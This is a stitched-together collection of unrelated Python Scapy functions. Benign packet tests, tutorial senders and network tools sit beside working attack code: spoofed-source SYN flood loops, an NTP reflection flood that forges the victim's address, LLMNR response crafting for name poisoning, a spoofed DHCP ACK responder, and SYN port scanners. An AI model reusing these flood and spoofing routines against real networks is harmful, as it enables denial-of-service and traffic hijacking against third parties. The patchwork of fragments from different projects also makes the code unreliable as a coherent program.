def craft_LLMNR_IP(self, packet: Packet) -> Packet:
"""
This function craft an IP-LLMNR packet.
"""
name = packet[DNSQR].qname
source = packet[IP].src
return (
[
IP(ihl=5, proto=17, dst=source) /
UDP(sport=5355, dport=packet[UDP].sport) / LLMNRResponse(
id=packet[LLMNRQuery].id,
qdcount=1,
ancount=1,
qd=DNSQR(qname=name),
an=DNSRR(rrname=name, ttl=30, rdata=self.ip),
)
],
source,
name,
"LLMNR",
)
def handle_pkt(pkt):
NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00\x01\x00\x24" + "\x00" * 64
if IP in pkt and UDP in pkt and pkt[IP].src != h2_ip:
src_mac = pkt[Ether].src
dst_mac = pkt[Ether].dst
src_ip = pkt[IP].src
dst_ip = pkt[IP].dst
proto = pkt[IP].proto
sport = pkt[UDP].sport
dport = pkt[UDP].dport
id_tup = (src_ip, dst_ip, proto, sport, dport)
if src_ip in VALID_IPS:
if id_tup not in totals:
totals[id_tup] = 0
totals[id_tup] += 1
print("Received from %s total: %s" % (id_tup, totals[id_tup]))
# Respond with random payload
p = Ether(dst=src_mac, src=dst_mac) / IP(dst=pkt[IP].src,
src=pkt[IP].dst)
p = p / UDP(dport=pkt[UDP].sport,
sport=123) / NTP(NTP_MONLIST_RESPONSE)
print p.show()
sendp(p, iface="eth0", loop=0)
def flood(target):
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(
f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}"
)
else:
print(
f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}"
)
def craft_LLMNR_IP_type_28(self, packet: Packet) -> Packet:
"""
This function craft an IP-LLMNR packet, type 28.
"""
name = packet[DNSQR].qname
source = packet[IP].src
return (
[
IP(ihl=5, proto=17, dst=source) /
UDP(sport=5355, dport=packet[UDP].sport) / LLMNRResponse(
id=packet[LLMNRQuery].id,
qdcount=1,
ancount=2,
qd=DNSQR(qname=name, qtype=28),
an=self.craft_DNSv6_response(name),
)
],
source,
name,
"LLMNR",
)
def test_overlapping_segment_out_of_bounds():
"""
Basic test for overlapping segments overlapping beyond the edge of the packet.
"""
fragment = actions.fragment.FragmentAction(correct_order=True)
fragment.parse("fragment{tcp:-1:True:20}", logger)
packet = layers.packet.Packet(
IP(src="127.0.0.1", dst="127.0.0.1") / TCP(seq=100) /
("datadata11datadata"))
packet1, packet2 = fragment.run(packet, logger)
assert id(packet1) != id(packet2), "Duplicate aliased packet objects"
assert packet1["Raw"].load != packet2[
"Raw"].load, "Packets were not different"
assert packet1[
"Raw"].load == b'datadata11datadata', "Left packet incorrectly segmented"
assert packet2[
"Raw"].load == b"1datadata", "Right packet incorrectly fragmented"
assert packet1["TCP"].seq == 100, "First packet sequence number incorrect"
assert packet2["TCP"].seq == 109, "Second packet sequence number incorrect"
def test_segment_wrap3(logger):
"""
Tests if segment numbers can wrap around testing for off-by-one
"""
fragment = actions.fragment.FragmentAction(correct_order=True)
assert str(
fragment
) == "fragment{tcp:-1:True}", "Fragment returned incorrect string representation: %s" % str(
fragment)
packet = layers.packet.Packet(
IP(src="127.0.0.1", dst="127.0.0.1") / TCP() / ("data"))
packet["TCP"].seq = MAX_UINT - 2
packet1, packet2 = fragment.run(packet, logger)
assert id(packet1) != id(packet2), "Duplicate aliased packet objects"
assert packet1["Raw"].load != packet2[
"Raw"].load, "Packets were not different"
assert packet1["Raw"].load == b'da', "Left packet incorrectly fragmented"
assert packet2["Raw"].load == b"ta", "Right packet incorrectly fragmented"
assert packet1["TCP"].seq == MAX_UINT - 2
assert packet2["TCP"].seq == MAX_UINT
def testAll(dut):
""" test with eth+IPv4+TCP+Payload"""
fork(Clock(dut.clk, 6.4, 'ns').start())
dut._log.info("Running test")
dut.reset_n.value =0
dut.ethBus.value =0
dut.IPv4Bus.value =0
dut.payload_in_data.value =0
dut.tcpBus.value =0
yield ClockCycles(dut.clk, 10)
dut.reset_n.value =1
dut._log.info("end Rst")
dut.ethBus.value =int.from_bytes(raw(Ether(src="aa:aa:aa:aa:aa:aa",
dst='11:11:11:11:11:11',
type="IPv4")), 'little')
dut.IPv4Bus.value =int.from_bytes(raw(IP(src="192.168.1.1",
dst="192.168.1.2")), 'little')
dut.tcpBus.value =int.from_bytes(raw(TCP(sport=80, dport=12000)), 'little')
dut.payload_in_data.value =int(0xDEADBEEFDEADBEEF)
yield ClockCycles(dut.clk, 15)
yield ClockCycles(dut.clk, 1)
yield ClockCycles(dut.clk, 15)
dut._log.info("end Test")
def cmd_traceroute(ip, port, iface):
conf.verb = False
if iface:
conf.iface = iface
pkts = IP(dst=ip, ttl=(1, 16)) / TCP(dport=port)
for pkt in pkts:
ans = sr1(pkt, timeout=1, iface=conf.iface)
if not ans:
print('.')
continue
print(ans.summary())
if TCP in ans and ans[TCP].flags == 18:
break
return True
def test_single_dns_resp_packet():
packets = [
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / UDP(sport=80, dport=53) /
DNS(rd=1,
qd=DNSQR(qtype="A", qname="google.com"),
an=DNSRR(rdata="123.0.0.1"))
]
events = list(packets_to_datasource_events(packets).events())
assert len(events) == 1
assert events[0]["src_mac"] == "ab:ab:ab:ab:ab:ab"
assert events[0]["dst_mac"] == "12:12:12:12:12:12"
assert events[0]["src_ip"] == "127.0.0.1"
assert events[0]["dst_ip"] == "192.168.1.1"
assert events[0]["sport"] == 80
assert events[0]["dport"] == 53
assert events[0]["qname"] == "google.com."
assert events[0]["qanswer"] == "123.0.0.1"
assert events[0]["qtype"] == "A"
assert events[0]["event_type"] == "DNS"
def test_single_http_packet():
packets = [
Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") /
IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) /
HTTP() /
HTTPRequest(Method="GET", Path="/foo", Host="https://google.com")
]
events = list(packets_to_datasource_events(packets).events())
assert len(events) == 1
assert events[0]["src_mac"] == "ab:ab:ab:ab:ab:ab"
assert events[0]["dst_mac"] == "12:12:12:12:12:12"
assert events[0]["src_ip"] == "127.0.0.1"
assert events[0]["dst_ip"] == "192.168.1.1"
assert events[0]["sport"] == 12345
assert events[0]["dport"] == 80
assert events[0]["http_method"] == "GET"
assert events[0]["uri"] == "/foo"
assert events[0]["http_dest"] == "https://google.com"
assert events[0]["event_type"] == "HTTPRequest"
def main():
src_ip = get_if_addr("eth0")
r = redis.Redis(unix_socket_path='/var/run/redis/redis.sock')
fmt = src_ip + "*"
key = r.keys(fmt)
dst_ip_list = []
for i in key:
dst_ip_list.append((str.split(i, "+"))[1])
dst_ip_list = set(dst_ip_list)
dst_ip = random.sample(dst_ip_list, 1)
fmt = src_ip + "+" + dst_ip[0] + "*"
key = r.keys(fmt)
route_info = random.sample(key, 1)
dst_ip, dst_mac, sr = get_route(route_info[0])
iface = get_if()
pkt = Ether(src=get_if_hwaddr(iface), dst=dst_mac, type=1792)
pkt = pkt / sr / '\x08\x00' / IP(dst=dst_ip) / UDP(
dport=1234, sport=random.randint(49152, 65535)) / "777777777"
pkt.show2()
sendp(pkt, iface=iface, verbose=False)
def craft_discover(self, hw=None):
"""Generates a DHCPDICSOVER packet
Args:
hw (str|bytes, optional): Defaults to MAC of Scapy's `conf.iface`.
Client MAC address to place in `chaddr`.
Returns:
scapy.layers.inet.IP: DHCPDISCOVER packet
"""
if not hw:
_, hw = get_if_raw_hwaddr(conf.iface)
else:
hw = mac_str_to_bytes(hw)
dhcp_discover = (IP(src="0.0.0.0", dst="255.255.255.255") /
UDP(sport=68, dport=67) /
BOOTP(chaddr=hw, xid=self.xid, flags=0x8000) /
DHCP(options=[("message-type", "discover"), "end"]))
# TODO: param req list
if settings.DEBUG:
print(dhcp_discover.show())
return dhcp_discover
def start_discovery(host, low=20, high=80):
for dport in range(low, high + 1):
try:
sport = random.randint(100, 999)
print(f"pinging..... {host}/[{dport}]|[{sport}]")
ack = IP(dst=host) / TCP(sport=sport, dport=dport, flags="S")
res = sr1(ack, timeout=1, verbose=0)
message = f"HOST: {host} PORT: {dport} || "
if res == None:
continue
elif isRecieved(res):
message += "OPEN"
close_connection(host, sport, dport)
elif isClosed(res):
message += "CLOSED"
else:
message += "FILTERED"
print(message)
message += ',\n'
logs.append(message)
except Exception as error:
print("[ERROR]" + str(error))
return logs
def _open_connection(self, url, rsport):
"""
Sends a SYN and waits for the responding SYN/ACK to open the TCP connection.
Returns the SYN/ACK response or raises a ICWTestException on error.
"""
# Try to send SYN
try:
syn = IP(dst=url) \
/ TCP(sport=rsport, dport=80, flags='S', seq=1,
options=[('MSS', self.mss)])
except socket.herror:
raise ICWTestException(Result.MALFORMED_HOST)
except socket.gaierror:
raise ICWTestException(Result.BAD_DNS)
# Wait for ack
ans, _ = sr(syn, timeout=self.ret_timeout, retry=2)
if not ans:
# TODO: verify that that is what happened here
raise ICWTestException(Result.SYN_ACK_TIMEOUT)
return ans[0][1]
def run(self):
self.opened = {}
self.closed = {}
mTargets = IP(dst=self.target)
if self.sport == 0:
self.sport = random.randint(1024, 65535)
if self.wizard:
self.runAsWizard()
for target in mTargets:
# for port in self.ports:
self.report_ports(target.dst, self.ports)
# if self.randomizeWaitTime:
# mTime = random.randint(0,float(self.waitTime))
# else:
# mTime = float(self.waitTime)
#
# time.sleep(mTime)
return True
def main(argv):
try:
opts, args = getopt.getopt(sys.argv[1:],'s:e:',['start=','end='])
except getopt.GetoptError:
sys.exit(2)
for opt, arg in opts:
if opt =='-s':
start = int(arg)
elif opt =='-e':
end = int(arg)
if start == '':
sys.exit()
if end == '':
sys.exit()
interface = popen('ifconfig | awk \'/eth0/ {print $1}\'').read()
ip_dst = gendest(start, end)
ip_src = sourceIPgen()
udp_packets = Ether()/IP(dst=ip_dst, src=ip_src,ttl=18)/UDP(dport=80,sport=2)
sendp(udp_packets, iface=interface.rstrip(), inter=0.05)
print(repr(udp_packets))
def syn_flood():
global FINISH
while True:
if FINISH:
break
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target_ip
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target_port
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(e)
else:
print("\033[1;32m" + "[+]" + "\033[0m" +
" SYN packet was sent!")
def ping_sweep(network):
# print(type(network))
address_list = []
for ip in network:
address_list.append(ip)
address_list = address_list[1:-1]
# address_list = ["10.0.0.111"] # Testing against a win10 on which I've blocked ICMP traffic
for ip in address_list:
print("Pinging ",ip,", please wait...")
response = sr1(
IP(dst=str(ip))/ICMP(),
timeout=2,
verbose=0
)
print(response)
if response == None:
print(str(ip) + " is down or unresponsive.")
elif response[ICMP].type == 3 and response[ICMP].code == (1 or 2 or 3 or 9 or 10 or 13): # I don't think this is the right syntax, but I'm having trouble finding the right thing
print(ip + " is actively blocking ICMP traffic.")
else:
print(ip + " is reponding")
def generate_packet(self, payload, dst):
# Generating the IP layer:
ip_layer = IP(src="37.200.69.143", dst=dst)
# Generate TCP layer
tcp_layer = TCP(sport=80,
dport=49451,
flags="PA",
seq=1,
ack=642,
options=[('MSS', 1460)])
http_layer = http.HTTP()
httpresponse_layer = http.HTTPResponse()
httpresponse_layer.__setattr__("Status-Line", 'HTTP/1.1 200 OK')
httpresponse_layer.__setattr__("Accept-Ranges", 'bytes')
httpresponse_layer.__setattr__("Server", 'nginx/0.7.67')
httpresponse_layer.__setattr__("Connection", 'keep-alive')
httpresponse_layer.__setattr__("Date", 'Sun, 9 Dec 2018 02:12:00 GMT')
httpresponse_layer.__setattr__("Content-Type",
'application/java-archive')
httpresponse_layer.__setattr__("Content-Length", '401811')
httpresponse_layer.Headers = 'Server: nginx/0.7.67\r\n' \
'Date: Sun, 16 Nov 2014 02:12:00 GMT\r\n' \
'Content-Type: application/java-archive\r\n' \
'Connection: keep-alive\r\n' \
'Content-Length: 401811\r\n' \
'X-Powered-By: PHP/5.4.4-14+deb7u14\r\n' \
'Accept-Ranges: bytes'
payload_layer = Raw(payload)
packet = ip_layer / tcp_layer / http_layer / httpresponse_layer / payload_layer
return packet
def test_bomb_trigger_parse_gas(logger):
"""
Tests bomb triggers having gas, including changing that gas while in use
"""
packet = layers.packet.Packet(
IP(src="127.0.0.1", dst="127.0.0.1") /
TCP(sport=2222, dport=3333, seq=100, ack=100, flags="SA"))
# parse a bomb trigger with 1 gas
trigger = actions.trigger.Trigger.parse("TCP:flags:SA:-1")
assert not trigger.is_applicable(packet, logger)
assert trigger.is_applicable(packet, logger)
# parse a trigger with no gas left
trigger = actions.trigger.Trigger.parse("TCP:flags:SA:0")
assert not trigger.is_applicable(packet, logger)
trigger = actions.trigger.Trigger.parse("TCP:flags:SA:-1")
assert not trigger.is_applicable(packet, logger)
# parse a trigger not using gas
trigger = actions.trigger.Trigger.parse("TCP:flags:SA")
assert trigger.is_applicable(packet, logger)
# Check that adding gas while gas is disabled does not work
trigger.add_gas(10)
assert trigger.gas_remaining == None
trigger.enable_gas()
trigger.set_gas(2)
assert trigger.is_applicable(packet, logger)
assert trigger.is_applicable(packet, logger)
assert not trigger.is_applicable(packet, logger)
# Test that it can handle leading/trailing []
trigger = actions.trigger.Trigger.parse("[TCP:flags:SA]")
assert trigger.is_applicable(packet, logger)
def handle_packet(packet):
eth = packet.getlayer(Ether)
ip = packet.getlayer(IP)
udp = packet.getlayer(UDP)
bootp = packet.getlayer(BOOTP)
dhcp = packet.getlayer(DHCP)
dhcp_message_type = None
if not dhcp:
return False
for opt in dhcp.options:
if opt[0] == "message-type":
dhcp_message_type = opt[1]
# dhcp request
if dhcp_message_type == 3:
client_ip = client_net + str(random.randint(2,254))
dhcp_ack = Ether(src=eth.dst, dst=eth.src) / \
IP(src=dhcpserver, dst=client_ip) / \
UDP(sport=udp.dport,
dport=udp.sport) / \
BOOTP(op=2,
chaddr=eth.dst,
siaddr=gateway,
yiaddr=client_ip,
xid=bootp.xid) / \
DHCP(options=[('message-type', 5),
('requested_addr', client_ip),
('subnet_mask', '255.255.255.0'),
('router', gateway),
('name_server', nameserver),
('end')])
print("Send spoofed DHCP ACK to %s" % ip.src)
sendp(dhcp_ack, iface=dev)
def test_01_route_classified_v4(self):
test_packet = Ether(
dst='56:0e:37:46:a2:21', src='b6:59:5f:11:c1:2a') / IP(
src="10.11.12.13", dst="1.1.1.1") / TCP(sport=45678, dport=80)
self.sendp(test_packet, iface=self.IFACE_NAME_PY)
packet = self.wait_for_packet(
self.eth_tx, lambda packet: isinstance(packet.payload, IP) and
packet.payload.dst == '3.4.5.6')
assert isinstance(packet, Ether)
assert_equals(packet.dst, self.py_side_mac)
fou_ip = packet.payload
assert isinstance(fou_ip, IP) # Expecting an IP packet
assert_equals(fou_ip.src, '65.65.65.65')
assert_equals(fou_ip.dst, '3.4.5.6')
fou_udp = fou_ip.payload
assert isinstance(fou_udp, UDP) # Expecting a FOU packet
assert_equals(fou_udp.sport, self.sport_for_packet(test_packet))
assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT)
glb_gue = fou_udp.payload
assert isinstance(
glb_gue,
GLBGUE) # Expecting a GUE packet (scapy will always map this)
assert_equals(glb_gue.private_data[0].hop_count, 1)
assert_equals(glb_gue.private_data[0].next_hop, 0)
assert_equals(glb_gue.private_data[0].hops, ['2.3.4.5'])
inner_ip = glb_gue.payload
assert isinstance(inner_ip, IP) # Expecting the inner IP packet
assert_equals(inner_ip.dst, '1.1.1.1')
inner_tcp = inner_ip.payload
assert isinstance(inner_tcp, TCP) # Expecting the inner TCP packet
assert_equals(inner_tcp.dport, 80)
def test_03_icmp_echo_request(self):
test_packet = Ether() / IP(src="10.11.12.13", dst="1.1.1.1") / ICMP(
type=8, code=0)
self.sendp(test_packet, iface=self.IFACE_NAME_PY)
packet = self.wait_for_packet(
self.eth_tx, lambda packet: isinstance(packet.payload, IP) and
packet.payload.dst == '3.4.5.6')
assert isinstance(packet, Ether)
assert_equals(packet.dst, self.py_side_mac)
fou_ip = packet.payload
assert isinstance(fou_ip, IP) # Expecting an IP packet
assert_equals(fou_ip.src, '65.65.65.65')
assert_equals(fou_ip.dst, '3.4.5.6')
fou_udp = fou_ip.payload
assert isinstance(fou_udp, UDP) # Expecting a FOU packet
assert_equals(fou_udp.dport, self.DIRECTOR_GUE_PORT)
glb_gue = fou_udp.payload
assert isinstance(
glb_gue,
GLBGUE) # Expecting a GUE packet (scapy will always map this)
assert_equals(glb_gue.private_data[0].hop_count, 1)
assert_equals(glb_gue.private_data[0].next_hop, 0)
assert_equals(glb_gue.private_data[0].hops, ['2.3.4.5'])
inner_ip = glb_gue.payload
assert isinstance(inner_ip, IP) # Expecting the inner IP packet
assert_equals(inner_ip.src, '10.11.12.13')
assert_equals(inner_ip.dst, '1.1.1.1')
inner_tcp = inner_ip.payload
assert isinstance(inner_tcp, ICMP) # Expecting the inner ICMP packet
assert_equals(inner_tcp.type, 8)
assert_equals(inner_tcp.code, 0)
def main():
if len(sys.argv) < 2:
print 'pass 2 arguments: <destination>'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
print "sending on interface %s to %s" % (iface, str(addr))
while True:
print
s = str(raw_input('Define Message Type: 3(PUB), 8(SUB), 10(UNSUB) '))
if s == "q":
break
print
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
try:
pkt = pkt / MQTT(message_type=int(s), DUP=0, QoS=0, R=0)
except ValueError as e:
print '[MQTT]' + e
pass
s = str(raw_input('Define Topic Type: 0~2^16-1 '))
if s == "q":
break
print
try:
pkt = pkt / Topic(topic=int(s), debug=int(0))
except ValueError as e:
print '[Topic]' + e
pass
pkt = pkt / IP(dst=addr) / TCP(dport=4321, sport=1234)
pkt.show2()
sendp(pkt, iface=iface, verbose=True)
def main(lhost, rhost, rport):
"""
Completes the three way handshake, then determines
what service is available on that port, if any
"""
try:
rport = int(rport)
except ValueError:
print("{} does not appear to be a valid number.".format(rport))
print("Please change the destination port value and try again.")
return
source_port = randint(1024, 65535)
# Packet[1] SYN
ip = IP(src=lhost, dst=rhost)
tcp = TCP(sport=source_port, dport=rport, flags='S')
syn = ip/tcp
# Packet[2] SYN-ACK
syn_ack = sr1(syn)
replyflag = syn_ack.sprintf("%TCP.flags%")
print ("Received TCP Reply flag {}".format(replyflag))
# Packet[3] ACK
if replyflag == 'SA':
SEQ = syn_ack[TCP].ack
ACK = syn_ack[TCP].seq + 1
source_port = syn_ack.dport # The OS may change SPORT
tcp = TCP(dport=rport, flags='A', seq=SEQ, ack=ACK, sport=source_port)
send(ip/tcp)
# Equivalent to the C language function getservbyport()
TCP_REVERSE = dict((TCP_SERVICES[k], k) for k in TCP_SERVICES.keys())
print("Port {} is {}".format(rport, TCP_REVERSE[rport]))
def main():
if len(sys.argv) < 4:
print 'pass 3 arguments: <op> <keyhash> "<message>" (node, load)'
exit(1)
op = int(sys.argv[1])
keyhash = int(sys.argv[2])
msg = sys.argv[3]
node = 0
load = 0
if len(sys.argv) >= 6:
node = int(sys.argv[4])
load = int(sys.argv[5])
dst_ip = server_ip
src_ip = client_ip
pkt = Ether(src=client_mac, dst=server_mac)
pkt = pkt / IP(dst=dst_ip, src=src_ip)
pkt = pkt / UDP(dport=12345, sport=random.randint(49152, 65535))
pkt = pkt / Pegasus(op=op, keyhash=keyhash, node=node, load=load)
pkt = pkt / msg
pkt.show2()
sendp(pkt, iface=client_iface, verbose=False)
def main():
if len(sys.argv) < 3:
print 'pass 2 arguments: <destination> "<message>"'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
print "sending on interface %s to %s" % (iface, str(addr))
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / IP(dst=addr, options=IPOption_DRIP(
count=0, swtraces=[])) / UDP(
dport=4321,
sport=1234) / sys.argv[2] #random.randint(49152,65535) for sport
pkt.show2()
#Wrap this in a repeated loop for how long the timer indicates
try:
for i in range(int(sys.argv[3])):
sendp(pkt, iface=iface)
sleep(1)
except KeyboardInterrupt:
raise
def flood(target):
server = random.choice(ntp_servers)
# Packet
packets = random.randint(10, 150)
server = server.replace("\n", "")
try:
packet = (
IP(dst=server, src=target[0]) /
UDP(sport=random.randint(2000, 65535), dport=int(target[1])) /
Raw(load=payload))
send(packet, count=packets, verbose=False)
except gaierror:
print(
f"{Fore.RED}[!] {Fore.MAGENTA}NTP server {server} is offline!{Fore.RESET}"
)
except Exception as e:
print(
f"{Fore.MAGENTA}Error while sending NTP packet\n{Fore.MAGENTA}{e}{Fore.RESET}"
)
else:
print(
f"{Fore.GREEN}[+] {Fore.YELLOW}Sending {packets} packets from NTP server {server} to {'{}:{}'.format(*target)}.{Fore.RESET}"
)
def main():
if len(sys.argv) < 3:
print 'pass 3 arguments: <destination> <dst_tor> <seq_no>'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
print "sending on interface %s to %s" % (iface, str(addr))
with open("attributes.txt") as f:
attrList = (line.rstrip() for line in f)
attrList = list(line for line in attrList if line) # Non-blank lines
for x in attrList:
HulappProtocol.add_IntField(x, 0)
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP(
dst=addr, proto=HULAPP_PROTOCOL) / HulappProtocol(
dst_tor=int(sys.argv[2]), seq_no=int(sys.argv[3]))
# pkt.show2()
ls(pkt)
sendp(pkt, iface=iface, verbose=False)
def send_data(server_ip, client_port, client_seq, server_seq, client_isn, example_id, packet_num):
if client_seq < client_isn:
# SEQ number wraparound
offset = client_seq + 2**32 - client_isn - 1
else:
offset = client_seq - client_isn - 1
if offset < 0:
offset = 0
if offset >= 5:
payload = BAD_KEYWORD + '#' + str(example_id) + '#' + str(packet_num) + HTTP_REQ_SUFFIX
else:
payload = "GET /" + BAD_KEYWORD + '#' + str(example_id) + '#' + str(packet_num) + HTTP_REQ_SUFFIX
payload = payload[offset:]
data_pkt = IP(dst=server_ip)/TCP(sport=client_port, dport=SERVER_PORT, flags='A', seq=client_seq, ack=server_seq)/Raw(load=payload)
data_pkt['IP'].ttl = 163 # to bypass the iptables rule
#hexdump(data_pkt)
sleep(0.2)
send(data_pkt)
logger.info("Sent Data packet...")
if args.gfw:
logger.info("Waiting %ds for server and GFW response..." % GFW_TIME_WAIT_RST)
sleep(GFW_TIME_WAIT_RST)
